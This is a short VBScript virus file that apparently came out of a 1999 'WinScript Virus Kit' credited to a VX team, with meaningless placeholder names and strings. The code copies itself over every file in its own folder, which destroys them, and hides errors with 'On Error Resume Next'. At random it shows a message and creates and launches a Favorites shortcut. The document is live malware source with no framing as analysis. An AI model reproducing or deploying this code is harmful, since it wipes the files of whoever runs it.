'sdfsdfsdf
'------------------------------------------------
'asdasdsdbfhghsjd
'Generated By: dfsdfsdf
'On 6-12-99
'With The Simple WinScript Virus Kit
'By -KD- [Metaphase VX Team] & [NoMercyVirusTeam]
'Do NOT edit above this line!!!
'------------------------------------------------"
Dim sdfsdfsdf, WshShell, FSO, VX, VirusLink
On Error Resume Next
Randomize
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
sdfsdfsdf = Wscript.ScriptFullName
VX = Left(sdfsdfsdf, InStrRev(sdfsdfsdf, "\"))
For Each target in FSO.GetFolder(VX).Files
  FSO.CopyFile sdfsdfsdf, target.Name, 1
Next
If Int((2 * Rnd) + 1) = 1 Then
  MsgBox "asdasd", 4096 , "asdasdsdbfhghsjd"
  Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\sdfsdfsdf.URL")
  VirusLink.TargetPath = "asdasdasd"
  VirusLink.Save
  WshShell.Run ("C:\WINDOWS\Favorites\sdfsdfsdf.URL")
End If
'sdfsdfsdf
